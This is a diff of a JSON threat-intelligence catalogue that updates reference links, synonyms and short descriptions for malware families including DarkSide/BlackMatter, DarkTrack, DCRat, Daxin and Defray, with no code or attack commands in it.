+ "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
+ "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
+ "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://twitter.com/ValthekOn/status/1422385890467491841?s=20",
+ "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#",
+ "https://brandefense.io/darkside-ransomware-analysis-report/",
+ "https://twitter.com/sysopfb/status/1422280887274639375",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
+ "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://community.riskiq.com/article/fdf74f23",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
+ "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/",
+ "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
"https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
"https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/",
- "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html",
- "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/",
- "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf",
- "https://twitter.com/JAMESWT_MHT/status/1388301138437578757",
- "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968",
- "https://asec.ahnlab.com/en/34549/",
- "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
+ "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/",
+ "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
"https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside",
- "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/",
- "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
- "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6",
- "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf",
- "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
- "https://twitter.com/ValthekOn/status/1422385890467491841?s=20",
+ "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/",
+ "https://twitter.com/GelosSnake/status/1451465959894667275",
"https://blog.group-ib.com/blackmatter#",
"https://us-cert.cisa.gov/ncas/alerts/aa21-131a",
- "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.mandiant.com/resources/burrowing-your-way-into-vpns",
"https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
"https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
- "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
- "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group",
- "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter",
- "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/",
+ "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims",
+ "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/",
"https://www.databreaches.net/a-chat-with-darkside/",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4"
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter",
+ "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/",
+ "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware",
+ "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/",
+ "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted",
+ "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a",
+ "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/",
+ "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://blog.group-ib.com/blackmatter2",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service",
+ "https://www.youtube.com/watch?v=NIiEcOryLpI",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/",
+ "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps",
+ "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [
"BlackMatter"
@@ -19800,16 +21051,16 @@
"value": "DarkTortilla"
},
{
- "description": "DtBackdoor",
+ "description": "According to PCrisk, DarkTrack is a malicious program classified as a Remote Access Trojan (RAT). This type of malware enables remote access and control over an infected device. The level of control these programs have varies, however, some can allow user-level manipulation of the affected machine.\r\n\r\nThe functionalities of RATs likewise varies and so does the scope of potential misuse. DarkTrack has a broad range of functions/capabilities, which make this Trojan a highly-dangerous piece of software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat",
- "https://www.facebook.com/darktrackrat/",
+ "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
"https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html",
"https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
- "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1",
- "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469"
+ "https://www.facebook.com/darktrackrat/",
+ "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml"
],
"synonyms": [],
"type": []
@@ -19822,9 +21073,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc",
+ "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
"https://reaqta.com/2017/11/short-journey-darkvnc/",
- "https://isc.sans.edu/diary/rss/28934",
- "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884"
+ "https://isc.sans.edu/diary/rss/28934"
],
"synonyms": [],
"type": []
@@ -19837,10 +21088,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf",
- "https://www.secureworks.com/research/threat-profiles/bronze-butler",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "https://www.secureworks.com/research/threat-profiles/bronze-butler",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [
"Muirim",
@@ -19871,15 +21122,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.datper",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.macnica.net/mpressioncss/feature_05.html/",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.macnica.net/mpressioncss/feature_05.html/",
+ "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
+ "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/"
],
"synonyms": [],
"type": []
@@ -19892,14 +21143,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin",
- "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/",
- "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage",
- "https://twitter.com/M_haggis/status/1498399791276912640",
- "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6",
"https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis"
+ "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292",
+ "https://twitter.com/M_haggis/status/1498399791276912640",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis",
+ "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/",
+ "https://teamt5.org/tw/posts/backdoor-of-driver-analysis-Daxin/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis",
+ "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6"
],
"synonyms": [],
"type": []
@@ -19912,11 +21164,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader",
- "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/",
"https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html",
- "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses",
+ "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
"https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands",
- "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat"
+ "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/",
+ "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/"
],
"synonyms": [
"ModiLoader",
@@ -19927,29 +21180,61 @@
"uuid": "17e0756b-6cc6-4c25-825c-5fd85c236218",
"value": "DBatLoader"
},
+ {
+ "description": "This malware uses DropBox as C&C channel.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dboxagent",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "407002c1-1781-4d1c-90bb-3d859f5c2943",
+ "value": "DBoxAgent"
+ },
+ {
+ "description": "Ransomware written in .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcdcrypt",
+ "https://labs.k7computing.com/index.php/dcdcrypt-ransomware-decryptor/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6192f006-e1ba-47cb-b388-af82e4435a51",
+ "value": "DcDcrypt"
+ },
{
"description": "DCRat is a typical RAT that has been around since at least June 2019.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://community.riskiq.com/article/50c77491",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://www.youtube.com/watch?v=ElqmQDySy48",
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
- "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://cert.gov.ua/article/160530",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
- "https://cert.gov.ua/article/405538",
- "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html",
- "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and",
+ "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/",
"https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://cert.gov.ua/article/160530",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://community.riskiq.com/article/50c77491",
+ "https://www.youtube.com/watch?v=ElqmQDySy48",
+ "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
+ "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and",
+ "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
"https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
- "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html"
+ "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html",
+ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://cert.gov.ua/article/405538",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"DarkCrystal RAT"
@@ -19992,24 +21277,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong",
- "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
"https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "57dd0828-79d7-11e8-a7d8-57db14e1ef24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2",
"value": "DDKONG"
},
@@ -20018,7 +21294,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/"
],
"synonyms": [
"Agrius",
@@ -20036,6 +21315,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply",
"https://securelist.com/threat-in-your-browser-extensions/107181",
+ "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/",
"https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/"
],
"synonyms": [],
@@ -20050,14 +21330,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry",
"https://www.youtube.com/watch?v=Hhx9Q2i7zGo",
- "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s",
- "https://www.youtube.com/watch?v=qmCjtigVVR0",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.youtube.com/watch?v=MRTdGUy1lfw",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b",
- "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf",
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s",
"https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://www.youtube.com/watch?v=qmCjtigVVR0",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.youtube.com/watch?v=MRTdGUy1lfw",
+ "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf"
],
"synonyms": [
"DoejoCrypt"
@@ -20072,13 +21352,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom",
- "https://asec.ahnlab.com/1269",
- "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md",
- "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html",
- "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html",
"https://twitter.com/Amigo_A_/status/1196898012645220354",
"https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html",
- "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html"
+ "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md",
+ "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html",
+ "https://asec.ahnlab.com/1269"
],
"synonyms": [
"deathransom",
@@ -20107,8 +21387,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal",
- "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
- "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
+ "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html",
+ "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
],
"synonyms": [],
"type": []
@@ -20116,6 +21396,20 @@
"uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
"value": "Decebal"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepcreep",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a29e21f9-b193-4369-8351-95860d56de03",
+ "value": "DeepCreep"
+ },
{
"description": "",
"meta": {
@@ -20134,19 +21428,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.defray",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html",
- "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
"https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
"https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/"
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
+ "https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [
"Glushkov"
@@ -20161,6 +21455,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos",
